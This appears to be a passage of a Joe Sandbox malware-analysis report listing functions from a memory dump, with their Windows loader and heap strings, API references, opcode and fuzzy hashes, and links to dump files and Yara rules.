String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: b0e71d89dfe2c45d8a06f7ac72057da670eed15675584f6089c6a678592d9751
Instruction ID: 27875fe221f0a758eb3d5b6b65c5a0587fb7aa9d15017244087ed72afe3dd915
Opcode Fuzzy Hash: b0e71d89dfe2c45d8a06f7ac72057da670eed15675584f6089c6a678592d9751
Instruction Fuzzy Hash: BA412732A1029A8FE711CB94CC40B9DBBB8EF66344F14465AEA00EB781D7749A01CB11

Function 21180BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 211D543E
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 211D5449
HEAP[%wZ]: , xrefs: 211D5431

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: dd6337f25c1b931b78d34199f220fbc51cc789da523022dc13c586b7af1c5833
Instruction ID: 3e99d4e65f9705c3fa28ab60115de13ee2db894a94904d259b289923ed71a87d
Opcode Fuzzy Hash: dd6337f25c1b931b78d34199f220fbc51cc789da523022dc13c586b7af1c5833
Instruction Fuzzy Hash: 6711E132315086DFE799CA14C490FA6B7B8EF4172AF16C26DE405CB291EB35DB41CB92

Function 211F20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 211F20F3
minkernel\ntdll\ldrinit.c, xrefs: 211F2104
LdrpInitializationFailure, xrefs: 211F20FA

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: b8bcf8efd30f67c300b0ca62d39dd78a5fc1315d76772991a32edafc6bbf07a0
Instruction ID: dd54b959f3fad7e0efe941778b42408f92e7a2de43ec7138b6d95028a742b154
Opcode Fuzzy Hash: b8bcf8efd30f67c300b0ca62d39dd78a5fc1315d76772991a32edafc6bbf07a0
Instruction Fuzzy Hash: B6F02275A40348BFE718DA48CC96FDA3BACEB41B98F204018F60477281E2B4EB00C680

Function 211803E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 211D4D8A

Strings

#%u, xrefs: 211D4D82

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: c3f26e6bec0ce6c4146ed80010b81cd2edf48480b9a039ced24b7514ee5a5e32
Instruction ID: 3a92c094278e74605c111a883560acf76fd98e7427afddd4ddb12b815ffd94d9
Opcode Fuzzy Hash: c3f26e6bec0ce6c4146ed80010b81cd2edf48480b9a039ced24b7514ee5a5e32
Instruction Fuzzy Hash: CF716972A0014A9FDB05CFA8C991FAEB7F8EF18344F164169E904E7651EB34EE01CB61

Function 2119EBFC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 138COMMON

Download Yara Rule

Strings

\&!, xrefs: 2119ED00

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: \&!
API String ID: 0-3243132376
Opcode ID: 2ceedafedb0b3fa27c3c689f0128274a286fe8a0a53ff4879e2a10267c4a6533
Instruction ID: 2d845aaa00c2a9cb9fc11f57da6a63e4cf7fb09f9483b051b043f7885f4358e4
Opcode Fuzzy Hash: 2ceedafedb0b3fa27c3c689f0128274a286fe8a0a53ff4879e2a10267c4a6533
Instruction Fuzzy Hash: 5741E4722057429FD715CF28C980A4BB7E9FF88328F11882DE9A6C3651EB35EB45CB51

Function 211F892A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 211F895E

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: e420f045fffdcc673889509101946589720f815dfcb37836184828e8eaa838ae
Instruction ID: 4e899a85df6b9f1d1b76d678b1af6dffe003ce50ccc14366c4731086e64d847a
Opcode Fuzzy Hash: e420f045fffdcc673889509101946589720f815dfcb37836184828e8eaa838ae
Instruction Fuzzy Hash: 7F01F7322003469FEB145E51CCC4E967B6DFFD6398B20103CF64116591DF306A81C792

Function 2117A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 2117AA13
LdrResSearchResource Exit, xrefs: 2117AA25

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 4fa3fa4fee8728a24278f9376849b488e59e4ca7fe924cf2ceb5f015181221c5
Instruction ID: e5940d52806946056a07a7cccd33ca3b43a30fe612e79dd77581439b0d8a18f1
Opcode Fuzzy Hash: 4fa3fa4fee8728a24278f9376849b488e59e4ca7fe924cf2ceb5f015181221c5
Instruction Fuzzy Hash: 83E1A072E04219AFEB12CF94DD80BEEBBB9AF19310F15452AE910E7381D7749B42CB51

Function 2123A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 2123A44B
`, xrefs: 2123A551

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 036277f0dbba4597c1d8bbca5b83fe55d0de517d83027267a1e1f4f4c8023405
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 51C1AAB12043429FEB19CF24CC41B6ABBE5AFD5358F044A3DF696CA290D775E605CB82

Function 21248324 Relevance: 2.7, Strings: 2, Instructions: 192COMMON

Download Yara Rule

Strings

Lm$!, xrefs: 212484F7
Lm$!, xrefs: 21248391, 2124845A, 212484A4, 21248394, 21248460

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: Lm$!$Lm$!
API String ID: 0-2051955969
Opcode ID: a62ad4c2c5bb741096c1bd93f5ea9a8165155750d4b9e449c80bb0c72d9a21a1
Instruction ID: aaf52206aa006dafc82a188db533d1283f39ad31cc472e1cdde7fa7f28f18ee8
Opcode Fuzzy Hash: a62ad4c2c5bb741096c1bd93f5ea9a8165155750d4b9e449c80bb0c72d9a21a1
Instruction Fuzzy Hash: 85710B71D1024AAFDB59CFD4CC81FEEBBB9FB04354F104129F624A6290E774AA45CB91

Function 211EE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 211EE75A
UEFI, xrefs: 211EE751

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 7e8cf68507c6961ca9c1184bf556a159c9f47b94fd37f00612d549c4731ad2ed
Instruction ID: cc974d4fa8553957b7e432ae40228d81af0bbe306725479c95b1a178261b2502
Opcode Fuzzy Hash: 7e8cf68507c6961ca9c1184bf556a159c9f47b94fd37f00612d549c4731ad2ed
Instruction Fuzzy Hash: 82617D71E01A199FDB15CFA8C884FADBBB9FB44704F21406DE659EB251D731AA00CB51

Function 212143D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 21214525
@, xrefs: 21214437

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: e27c62957b18d90497ae45c2db07efe3c7f159f1e8b9a8afe33fef0248ecac64
Instruction ID: 796490146b203a93ff9294392e0bfe86453f26b21f4b07ce66f8721ef20bb0be
Opcode Fuzzy Hash: e27c62957b18d90497ae45c2db07efe3c7f159f1e8b9a8afe33fef0248ecac64
Instruction Fuzzy Hash: E4511871E4025EAEDB11CFA5CC80FEEBBB8EB54758F100529F615B7291D7309A05CBA0

Function 2117A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 2117A309
RtlpResUltimateFallbackInfo Enter, xrefs: 2117A2FB

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: ea000603b10f05e79cf93ad098d63d63da5b46ada8871b237aaea9a4cf663f28
Instruction ID: 143f825bbc8e7848716395176f0fc979dc90eaccf1d9ab1320f70ef97e882bbd
Opcode Fuzzy Hash: ea000603b10f05e79cf93ad098d63d63da5b46ada8871b237aaea9a4cf663f28
Instruction Fuzzy Hash: 0841BC32A08649CFEB05CF59D840B9E7BB4EF86704F1981A9E910DB391E3B5DB01CB41

Function 211AA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 211AA5E4
Threadpool!, xrefs: 211AA5E9

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 37fba83837086b15239cc99e2398bd0ebc9dff5da8e0f573b9f2575e54743f2d
Instruction ID: 9f9021edeea01a164dac1bdf92b8e909aa58151bd230dbddfd84fa02e1d0fb2b
Opcode Fuzzy Hash: 37fba83837086b15239cc99e2398bd0ebc9dff5da8e0f573b9f2575e54743f2d
Instruction Fuzzy Hash: 7101DCB6540640AFD351CF24DE49F16BBE8E794B29F018939B65CC75D0E338EA04CB86

Function 2117C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 2117C8C3, 2117CA40

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 5e47536c110a434fd4d5b0defa35d1605dc2a447479cb030062cf3d36c3a1c82
Instruction ID: 1584390f61ee74ca56ced285dbf893b65acc8d5767bf588aa85daf48d1e1f633
Opcode Fuzzy Hash: 5e47536c110a434fd4d5b0defa35d1605dc2a447479cb030062cf3d36c3a1c82
Instruction Fuzzy Hash: 8D826D75E0021D8FEF15CFA9C880BEDBBB5BF49350F108169E919AB391D7319A82CB51

Function 2121A118 Relevance: 2.1, APIs: 1, Instructions: 591timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 2121A13A

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 77906352e84a39a3a3017300500c2e631fe4c0b984268192e97eae4c6deb78c6
Instruction ID: 9013e6c0bae29be5cb49292094f3a19aed9e4f098ae072e411b84de6e5e2b55b
Opcode Fuzzy Hash: 77906352e84a39a3a3017300500c2e631fe4c0b984268192e97eae4c6deb78c6
Instruction Fuzzy Hash: AE22BF706146E28EEB15CF29C851776BBF1AF46340F04885EFA968B28BD335E552CB70

Function 21176A50 Relevance: 2.0, APIs: 1, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b1327dc913a37e558016ddd04821d91d8dda84e1b79d946fb948dbbba93e4bc
Instruction ID: 67b20835b6dfe864d4f3c94307ded83d2bd04f0e237c1dd6d2a53c29cac1f74d
Opcode Fuzzy Hash: 5b1327dc913a37e558016ddd04821d91d8dda84e1b79d946fb948dbbba93e4bc
Instruction Fuzzy Hash: C832BD71A04215CFEB15CF68C880B9EBBF5FF49310F208569E955AB391DB34EA42CB91

Function 211765D0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0ab3462f9f2dd6cdc0fd55a0dbefdf9162474dcc6fe0b6f437aa281ed5f4668
Instruction ID: 3d275f7f422a1832fa8d8fce3e391bb2dcbbad1d05ebf53a6deb77b40abfa691
Opcode Fuzzy Hash: d0ab3462f9f2dd6cdc0fd55a0dbefdf9162474dcc6fe0b6f437aa281ed5f4668
Instruction Fuzzy Hash: 47E17C71608342CFD705CF28C490A9ABBF1FF89314F15896DE99987351EB31EA46CB92

Function 2119E5E7 Relevance: 1.8, APIs: 1, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66416ad15b808b0d1f0bf32cc02ccf06c017999c3a6a370e32ef63ee989e0e28
Instruction ID: 3bf21c432318463436c86672d2af8658023b82787fd32a868c9cfeb457790ad0
Opcode Fuzzy Hash: 66416ad15b808b0d1f0bf32cc02ccf06c017999c3a6a370e32ef63ee989e0e28
Instruction Fuzzy Hash: ADA13732E0165AAFEB11CB54C944FDE7BB8AF02754F110219EA20AB2D1D7749F41CBD2

Function 2117262C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 21172710

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 8b6dfaeba2968d19cecced628339ee9c49aa6c6e44e9cad67915ee85264ea335
Instruction ID: 7c819aba753cf70f416ed4b317118c7fb087d2dcaeb48ad37cc7c91bd529cafe
Opcode Fuzzy Hash: 8b6dfaeba2968d19cecced628339ee9c49aa6c6e44e9cad67915ee85264ea335
Instruction Fuzzy Hash: 0041AFB1901B05CFC759DF24C940A49B7B6FF65314F2181AAE4059B3A1EB30AB83CF91

Function 211F07C3 Relevance: 1.6, APIs: 1, Instructions: 114timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 211F083C

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 7c9f227289fd5ead4d84517aafb2673d15ffe742b4755afda914e08c5d483210
Instruction ID: 27cd019a49c4129b0c1bdd36ba3ec76d3e0b9aa459ee73654ccd507bd93afb1d
Opcode Fuzzy Hash: 7c9f227289fd5ead4d84517aafb2673d15ffe742b4755afda914e08c5d483210
Instruction Fuzzy Hash: 48417C719083419FD360DF25C845B9BBBE8FF98764F008A2EF598D7291D7749A04CB92

Function 21174859 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 211748F7

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: f52632a0fbab759ac5d63df01e0e2cb1c18e8267db4813926a1a3f82699f92ba
Instruction ID: 9d0c1089b9a5611ebb7c4cc078ad4883c7101b58d1621104bf9c4e86839ccec9
Opcode Fuzzy Hash: f52632a0fbab759ac5d63df01e0e2cb1c18e8267db4813926a1a3f82699f92ba
Instruction Fuzzy Hash: E241E470A043068FD715CF28D885B6ABBF9EF86354F11842DE6418B7A1EB74DB42CB91

Function 2121EBD0 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 2121EC31

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 40357db303c3dd262b9ce39785834d637e6734baee34f63f23415248962fe476
Instruction ID: 37bbbfb929790225095e9df2b05ba27af114b0161d0dc1a57ef0a3849a597612
Opcode Fuzzy Hash: 40357db303c3dd262b9ce39785834d637e6734baee34f63f23415248962fe476
Instruction Fuzzy Hash: AE3198B15053428FC706CF19CD8084ABBF5FF9A218F1589AEF5889B256D330DA84CF92

Function 21244B00 Relevance: 1.6, APIs: 1, Instructions: 57timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 21244B86

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 90f0f100b9f9207c9743c44b56468429100ebc424902720a412289b1aa04d689
Instruction ID: ea46022d11acf9d8ab90ff06aca3779bedb29611b273b5729004a62fcd967d26
Opcode Fuzzy Hash: 90f0f100b9f9207c9743c44b56468429100ebc424902720a412289b1aa04d689
Instruction Fuzzy Hash: DF11C236A00A529FD71A8A29DC44F57B7AAFFC5710F154529FB4687690EE30F902CB90

Function 211FA4B0 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 211FA51A

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_21140000_Bldtvandsfiltrene166.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: b329c19691b4f894c8c77c3f1b373f13ba315d455d2055d517cf3a9e8b4233d7
Instruction ID: c38651061f6de2f850495b8afe1e9ebcc71e8eea431bbd5dc08c8cd39c8249b7
Opcode Fuzzy Hash: b329c19691b4f894c8c77c3f1b373f13ba315d455d2055d517cf3a9e8b4233d7
Instruction Fuzzy Hash: 17018936100249ABCF028F84D844ECE3FAAFB4C754F068105FE18662B0C73ADA70EB81

Function 21242B57 Relevance: 1.5, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

2+$!, xrefs: 21242CCB, 21242CDC

Memory Dump Source

Source File: 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Offset: 21140000, based on PE: true

Associated: 0000000B.00000002.2276959569.0000000021269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2276959569.000000002126D000.00000040.00001000.00020000.00000000.sdmpDownload File
